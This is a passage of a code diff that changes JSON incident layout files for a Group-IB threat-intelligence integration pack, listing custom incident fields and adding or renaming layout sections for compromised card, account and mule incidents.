"isVisible": true + }, + { + "fieldId": "incident_devicelocalip", + "isVisible": true + }, + { + "fieldId": "incident_devicemacaddress", + "isVisible": true + }, + { + "fieldId": "incident_devicemodel", + "isVisible": true + }, + { + "fieldId": "incident_devicename", + "isVisible": true + }, + { + "fieldId": "incident_deviceosname", + "isVisible": true + }, + { + "fieldId": "incident_deviceosversion", + "isVisible": true + }, + { + "fieldId": "incident_deviceou", + "isVisible": true + }, + { + "fieldId": "incident_deviceusername", + "isVisible": true + }, + { + "fieldId": "incident_domainname", + "isVisible": true + }, + { + "fieldId": "incident_domainregistrarabuseemail", + "isVisible": true + }, + { + "fieldId": "incident_domainupdateddate", + "isVisible": true + }, + { + "fieldId": "incident_dsts", + "isVisible": true + }, + { + "fieldId": "incident_endpoint", + "isVisible": true + }, + { + "fieldId": "incident_endpointisolationstatus", + "isVisible": true + }, + { + "fieldId": "incident_endpointsdetails", + "isVisible": true + }, + { + "fieldId": "incident_escalation", + "isVisible": true + }, + { + "fieldId": "incident_eventid", + "isVisible": true + }, + { + "fieldId": "incident_eventtype", + "isVisible": true + }, + { + "fieldId": "incident_externalcategoryid", + "isVisible": true + }, + { + "fieldId": "incident_externalcategoryname", + "isVisible": true + }, + { + "fieldId": "incident_externalconfidence", + "isVisible": true + }, + { + "fieldId": "incident_externalendtime", + "isVisible": true + }, + { + "fieldId": "incident_externallastupdatedtime", + "isVisible": true + }, + { + "fieldId": "incident_externallink", + "isVisible": true + }, + { + "fieldId": "incident_externalseverity", + "isVisible": true + }, + { + "fieldId": "incident_externalstarttime", + "isVisible": true + }, + { + "fieldId": "incident_externalstatus", + "isVisible": true + }, + { + "fieldId": "incident_externalsubcategoryid", + "isVisible": true + }, + { + "fieldId": "incident_externalsubcategoryname", + "isVisible": true + }, + { + "fieldId": "incident_externalsystemid", + "isVisible": true + }, + { + "fieldId": "incident_failedlogonevents", + "isVisible": true + }, + { + "fieldId": "incident_failedlogoneventstimeframe", + "isVisible": true + }, + { + "fieldId": "incident_filehash", + "isVisible": true + }, + { + "fieldId": "incident_filemd5", + "isVisible": true + }, + { + "fieldId": "incident_filename", + "isVisible": true + }, + { + "fieldId": "incident_filenames", + "isVisible": true + }, + { + "fieldId": "incident_filepath", + "isVisible": true + }, + { + "fieldId": "incident_filepaths", + "isVisible": true + }, + { + "fieldId": "incident_filerelationships", + "isVisible": true + }, + { + "fieldId": "incident_filesha1", + "isVisible": true + }, + { + "fieldId": "incident_filesha256", + "isVisible": true + }, + { + "fieldId": "incident_filesize", + "isVisible": true + }, + { + "fieldId": "incident_fileupload", + "isVisible": true + }, + { + "fieldId": "incident_firstname", + "isVisible": true + }, + { + "fieldId": "incident_fullname", + "isVisible": true + }, + { + "fieldId": "incident_highriskyhosts", + "isVisible": true + }, + { + "fieldId": "incident_highriskyusers", + "isVisible": true + }, + { + "fieldId": "incident_hostnames", + "isVisible": true + }, + { + "fieldId": "incident_huntresultscount", + "isVisible": true + }, + { + "fieldId": "incident_ipblockedstatus", + "isVisible": true + }, + { + "fieldId": "incident_ipreputation", + "isVisible": true + }, + { + "fieldId": "incident_identitytype", + "isVisible": true + }, + { + "fieldId": "incident_incidentlink", + "isVisible": true + }, + { + "fieldId": "incident_incomingmirrorerror", + "isVisible": true + }, + { + "fieldId": "incident_investigationstage", + "isVisible": true + }, + { + "fieldId": "incident_isactive", + "isVisible": true + }, + { + "fieldId": "incident_lastmirroredtimestamp", + "isVisible": true + }, + { + "fieldId": "incident_lastname", + "isVisible": true + }, + { + "fieldId": "incident_logsource", + "isVisible": true + }, + { + "fieldId": "incident_lowlevelcategoriesevents", + "isVisible": true + }, + { + "fieldId": "incident_macaddress", + "isVisible": true + }, + { + "fieldId": "incident_md5", + "isVisible": true + }, + { + "fieldId": "incident_mitretacticid", + "isVisible": true + }, + { + "fieldId": "incident_mitretacticname", + "isVisible": true + }, + { + "fieldId": "incident_mitretechniqueid", + "isVisible": true + }, + { + "fieldId": "incident_mitretechniquename", + "isVisible": true + }, + { + "fieldId": "incident_mobiledevicemodel", + "isVisible": true + }, + { + "fieldId": "incident_numberoffoundrelatedalerts", + "isVisible": true + }, + { + "fieldId": "incident_numberofrelatedincidents", + "isVisible": true + }, + { + "fieldId": "incident_numberofsimilarfiles", + "isVisible": true + }, + { + "fieldId": "incident_os", + "isVisible": true + }, + { + "fieldId": "incident_ostype", + "isVisible": true + }, + { + "fieldId": "incident_osversion", + "isVisible": true + }, + { + "fieldId": "incident_objective", + "isVisible": true + }, + { + "fieldId": "incident_operationname", + "isVisible": true + }, + { + "fieldId": "incident_orglevel1", + "isVisible": true + }, + { + "fieldId": "incident_orglevel2", + "isVisible": true + }, + { + "fieldId": "incident_orglevel3", + "isVisible": true + }, + { + "fieldId": "incident_orgunit", + "isVisible": true + }, + { + "fieldId": "incident_outgoingmirrorerror", + "isVisible": true + }, + { + "fieldId": "incident_pid", + "isVisible": true + }, + { + "fieldId": "incident_parentcmdline", + "isVisible": true + }, + { + "fieldId": "incident_parentprocess", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesscmd", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessfilepath", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessids", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessmd5", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessname", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesspath", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesssha256", + "isVisible": true + }, + { + "fieldId": "incident_passwordchangeddate", + "isVisible": true + }, + { + "fieldId": "incident_phonenumber", + "isVisible": true + }, + { + "fieldId": "incident_policyactions", + "isVisible": true + }, + { + "fieldId": "incident_processcmd", + "isVisible": true + }, + { + "fieldId": "incident_processcreationtime", + "isVisible": true + }, + { + "fieldId": "incident_processid", + "isVisible": true + }, + { + "fieldId": "incident_processmd5", + "isVisible": true + }, + { + "fieldId": "incident_processname", + "isVisible": true + }, + { + "fieldId": "incident_processnames", + "isVisible": true + }, + { + "fieldId": "incident_processpath", + "isVisible": true + }, + { + "fieldId": "incident_processpaths", + "isVisible": true + }, + { + "fieldId": "incident_processsha256", + "isVisible": true + }, + { + "fieldId": "incident_projectid", + "isVisible": true + }, + { + "fieldId": "incident_protocol", + "isVisible": true + }, + { + "fieldId": "incident_protocolnames", + "isVisible": true + }, + { + "fieldId": "incident_referencedresourceid", + "isVisible": true + }, + { + "fieldId": "incident_referencedresourcename", + "isVisible": true + }, + { + "fieldId": "incident_registrationemail", + "isVisible": true + }, + { + "fieldId": "incident_registryhive", + "isVisible": true + }, + { + "fieldId": "incident_registrykey", + "isVisible": true + }, + { + "fieldId": "incident_registryvalue", + "isVisible": true + }, + { + "fieldId": "incident_registryvaluetype", + "isVisible": true + }, + { + "fieldId": "incident_relatedalerts", + "isVisible": true + }, + { + "fieldId": "incident_relatedcampaign", + "isVisible": true + }, + { + "fieldId": "incident_relatedendpoints", + "isVisible": true + }, + { + "fieldId": "incident_relatedreport", + "isVisible": true + }, + { + "fieldId": "incident_renderedhtml", + "isVisible": true + }, + { + "fieldId": "incident_reportname", + "isVisible": true + }, + { + "fieldId": "incident_resourceurl", + "isVisible": true + }, + { + "fieldId": "incident_rulename", + "isVisible": true + }, + { + "fieldId": "incident_sha1", + "isVisible": true + }, + { + "fieldId": "incident_sha256", + "isVisible": true + }, + { + "fieldId": "incident_sha512", + "isVisible": true + }, + { + "fieldId": "incident_ssdeep", + "isVisible": true + }, + { + "fieldId": "incident_scenario", + "isVisible": true + }, + { + "fieldId": "incident_selectedindicators", + "isVisible": true + }, + { + "fieldId": "incident_similarincidentsdbot", + "isVisible": true + }, + { + "fieldId": "incident_sourcecategory", + "isVisible": true + }, + { + "fieldId": "incident_sourcecreatetime", + "isVisible": true + }, + { + "fieldId": "incident_sourcecreatedby", + "isVisible": true + }, + { + "fieldId": "incident_sourceexternalips", + "isVisible": true + }, + { + "fieldId": "incident_sourcehostname", + "isVisible": true + }, + { + "fieldId": "incident_sourceip", + "isVisible": true + }, + { + "fieldId": "incident_sourceid", + "isVisible": true + }, + { + "fieldId": "incident_sourcenetwork", + "isVisible": true + }, + { + "fieldId": "incident_sourcenetworks", + "isVisible": true + }, + { + "fieldId": "incident_sourceport", + "isVisible": true + }, + { + "fieldId": "incident_sourcepriority", + "isVisible": true + }, + { + "fieldId": "incident_sourcestatus", + "isVisible": true + }, + { + "fieldId": "incident_sourceupdatedby", + "isVisible": true + }, + { + "fieldId": "incident_sourceusername", + "isVisible": true + }, + { + "fieldId": "incident_srcs", + "isVisible": true + }, + { + "fieldId": "incident_state", + "isVisible": true + }, + { + "fieldId": "incident_statusreason", + "isVisible": true + }, + { + "fieldId": "incident_stringsimilarityresults", + "isVisible": true + }, + { + "fieldId": "incident_subcategory", + "isVisible": true + }, + { + "fieldId": "incident_suspiciousexecutions", + "isVisible": true + }, + { + "fieldId": "incident_suspiciousexecutionsfound", + "isVisible": true + }, + { + "fieldId": "incident_tactic", + "isVisible": true + }, + { + "fieldId": "incident_tacticid", + "isVisible": true + }, + { + "fieldId": "incident_tags", + "isVisible": true + }, + { + "fieldId": "incident_target", + "isVisible": true + }, + { + "fieldId": "incident_teamname", + "isVisible": true + }, + { + "fieldId": "incident_technique", + "isVisible": true + }, + { + "fieldId": "incident_techniqueid", + "isVisible": true + }, + { + "fieldId": "incident_tenantname", + "isVisible": true + }, + { + "fieldId": "incident_threatfamilyname", + "isVisible": true + }, + { + "fieldId": "incident_threathuntingdetectedhostnames", + "isVisible": true + }, + { + "fieldId": "incident_threathuntingdetectedip", + "isVisible": true + }, + { + "fieldId": "incident_threatname", + "isVisible": true + }, + { + "fieldId": "incident_ticketacknowledgeddate", + "isVisible": true + }, + { + "fieldId": "incident_ticketcloseddate", + "isVisible": true + }, + { + "fieldId": "incident_ticketnumber", + "isVisible": true + }, + { + "fieldId": "incident_ticketopeneddate", + "isVisible": true + }, + { + "fieldId": "incident_toolusagefound", + "isVisible": true + }, + { + "fieldId": "incident_tools", + "isVisible": true + }, + { + "fieldId": "incident_urlsslverification", + "isVisible": true + }, + { + "fieldId": "incident_urls", + "isVisible": true + }, + { + "fieldId": "incident_usecasedescription", + "isVisible": true + }, + { + "fieldId": "incident_useragent", + "isVisible": true + }, + { + "fieldId": "incident_useranomalycount", + "isVisible": true + }, + { + "fieldId": "incident_userblockstatus", + "isVisible": true + }, + { + "fieldId": "incident_usercreationtime", + "isVisible": true + }, + { + "fieldId": "incident_userengagementresponse", + "isVisible": true + }, + { + "fieldId": "incident_userrisklevel", + "isVisible": true + }, + { + "fieldId": "incident_usersid", + "isVisible": true + }, + { + "fieldId": "incident_users", + "isVisible": true + }, + { + "fieldId": "incident_usersdetails", + "isVisible": true + }, + { + "fieldId": "incident_verdict", + "isVisible": true + }, + { + "fieldId": "incident_vulnerableproduct", + "isVisible": true + }, + { + "fieldId": "incident_appchannelname", + "isVisible": true + }, + { + "fieldId": "incident_samaccountname", + "isVisible": true + }, + { + "fieldId": "incident_similarincidents", + "isVisible": true + }, + { + "fieldId": "incident_useraccountcontrol", + "isVisible": true + } + ], + "isVisible": true, + "name": "Custom Fields", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + } + ] + }, + "group": "incident", + "id": "GIB Compromised Account Group Layout", + "name": "GIB Compromised Account Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json index ad4a65496e5f..87b9ce8ea5c3 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json @@ -423,7 +423,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, "w": 2, "x": 0, @@ -478,7 +478,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Person Information from GIB TIA", + "name": "Person Information from Group-IB", "static": false, "w": 2, "x": 0, @@ -519,6 +519,5 @@ "name": "GIB Compromised Account Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.10.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json new file mode 100644 index 000000000000..1785543e7c0a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json @@ -0,0 +1,582 @@ +{ + "description": "Layout for GIB Compromised Card Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotsource", + "height": 22, + "id": "incident-source-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 44, + "id": "incident-closeNotes-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-cd4f29e0-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "124ee3f0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "18f3a290-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "1f37caa0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "2584cc50-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-cdfd6b40-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "70e86b70-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "3d09f890-8492-11ef-87c7-cfae65ac92d0", + "index": 1, + "listId": "caseinfoid-cdfd6b40-71a3-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaretable", + "height": 106, + "id": "e6582420-7ef8-11ef-b283-25e62b0b3d26", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedeventstable", + "height": 106, + "id": "49798ba0-7cb2-11ef-90b5-fb0a4d432031", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d75c19c0-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 106, + "id": "0b7cf000-7c06-11ef-9463-3d1550681d08", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actors Table", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d819eb80-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "33c6da60-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "3b060440-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstcompromised", + "height": 22, + "id": "403b2d50-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastcompromised", + "height": 22, + "id": "45e1b5d0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d8d37780-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibcardissuer", + "height": 22, + "id": "eea826a0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcardnumber", + "height": 22, + "id": "f493f580-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcardtype", + "height": 22, + "id": "fb15e9e0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibpaymentsystem", + "height": 22, + "id": "00f69530-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Card Info From Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Compromised Card Group Layout", + "name": "GIB Compromised Card Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json index 76eedf722bbc..fa81e7009af2 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json @@ -453,7 +453,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -508,7 +508,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Person Information from GIB TIA", + "name": "Person Information from GIB", "static": false, "w": 2, "x": 0, @@ -549,6 +549,5 @@ "name": "GIB Compromised Card Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json index c5f20e58e539..d4009fb9475a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json @@ -321,7 +321,7 @@ "minH": 1, "minW": 2, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json index 62bd70908c95..d7190a4a63c1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json @@ -1,245 +1,516 @@ { "description": "Layout for GIB Compromised Mule", - "group": "indicator", + "group": "incident", "id": "GIB Compromised Mule Layout", - "indicatorsDetails": { + "name": "GIB Compromised Mule Layout", + "system": false, + "version": -1, + "fromVersion": "0.0.0", + "detailsV2": { "tabs": [ { - "id": "default-main", - "name": "Info", + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", "sections": [ - { - "h": 8, - "i": "default-main-comments", - "moved": false, - "name": "Comments", - "static": false, - "type": "comments", - "w": 1, - "x": 2, - "y": 3 - }, - { - "h": 2, - "hideName": true, - "i": "default-main-relatedIncidents", - "moved": false, - "name": "Related Incidents", - "static": false, - "type": "relatedIncidents", - "w": 2, - "x": 0, - "y": 6 - }, { "displayType": "ROW", "h": 2, - "i": "default-main-e2c8c970-a09d-11e9-8956-390f602b039a", + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, "items": [ { "endCol": 2, - "fieldId": "indicatortype", + "fieldId": "type", "height": 22, - "id": "indicator-type", + "id": "incident-type-field", "index": 0, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "modified", + "fieldId": "severity", "height": 22, - "id": "indicator-modified", + "id": "incident-severity-field", "index": 1, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "expiration", + "fieldId": "owner", "height": 22, - "id": "indicator-expiration", + "id": "incident-owner-field", "index": 2, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "timestamp", + "fieldId": "sourcebrand", "height": 22, - "id": "indicator-timestamp", - "index": 3, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, "sectionItemType": "field", "startCol": 0 } ], + "maxW": 3, "moved": false, - "name": "Basic Information", + "name": "Case Details", "static": false, "w": 1, "x": 0, - "y": 1 + "y": 0 }, { - "displayType": "ROW", - "h": 3, - "i": "default-main-indicatorTimeline", + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Timeline", + "name": "Notes", "static": false, - "type": "indicatorTimeline", + "type": "notes", "w": 1, "x": 2, "y": 0 }, { - "h": 1, - "hideName": true, - "i": "default-main-reputationStatus", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Reputation Status", + "name": "Work Plan", "static": false, - "type": "reputationStatus", + "type": "workplan", "w": 1, "x": 1, "y": 0 }, { - "h": 1, - "hideName": true, - "i": "default-main-expirationStatus", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, "moved": false, - "name": "Expiration Status", + "name": "Linked Incidents", "static": false, - "type": "expirationStatus", + "type": "linkedIncidents", "w": 1, - "x": 0, - "y": 0 + "x": 1, + "y": 11 }, { + "displayType": "ROW", "h": 2, - "i": "default-main-reputationSources", + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Reputation", + "name": "Child Incidents", "static": false, - "type": "reputationSources", + "type": "childInv", "w": 